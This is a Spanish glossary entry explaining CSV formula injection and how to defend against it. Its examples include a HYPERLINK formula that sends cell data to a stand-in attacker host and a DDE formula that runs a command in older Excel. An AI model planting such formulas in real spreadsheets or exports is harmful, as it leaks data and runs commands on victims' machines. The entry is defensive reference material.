Inyección CSV
¿Qué es Inyección CSV?
Inyección CSVAtaque que incrusta fórmulas de hoja de cálculo en archivos CSV exportados para que, al abrirlos en Excel o Sheets, se ejecuten acciones controladas por el atacante.
La inyección CSV, también llamada inyección de fórmulas, abusa de las aplicaciones de hoja de cálculo que evalúan automáticamente las celdas que comienzan con =, +, -, @ o un tabulador o salto de línea. Cuando una aplicación web almacena entrada del atacante y luego la exporta a CSV, el libro resultante puede invocar DDE, contactar URLs remotas, exfiltrar datos o instalar malware al abrirlo. El riesgo recae en el consumidor del archivo, no en la base de datos, por lo que se pasa por alto fácilmente. Las defensas incluyen anteponer una comilla simple u otro prefijo seguro en cualquier celda que comience con un carácter peligroso, validar y escapar los campos antes de exportarlos y advertir a los usuarios antes de abrir hojas no confiables.
● Ejemplos
- 01
Un formulario de contacto cuyo campo de nombre acepta =HYPERLINK("https://atacante.example/?l="&A2,"Clic") y filtra otras celdas al abrir la exportación.
- 02
Un informe CRM exportado con =cmd|'/c calc'!A1 que dispara DDE en versiones antiguas de Excel.
● Preguntas frecuentes
¿Qué es Inyección CSV?
Ataque que incrusta fórmulas de hoja de cálculo en archivos CSV exportados para que, al abrirlos en Excel o Sheets, se ejecuten acciones controladas por el atacante. Pertenece a la categoría de Ataques y amenazas en ciberseguridad.
¿Qué significa Inyección CSV?
Ataque que incrusta fórmulas de hoja de cálculo en archivos CSV exportados para que, al abrirlos en Excel o Sheets, se ejecuten acciones controladas por el atacante.
¿Cómo defenderse de Inyección CSV?
Las defensas contra Inyección CSV combinan habitualmente controles técnicos y prácticas operativas, como se detalla en la definición.
¿Cuáles son otros nombres para Inyección CSV?
Nombres alternativos comunes: Inyección de fórmulas, Inyección de macros de Excel.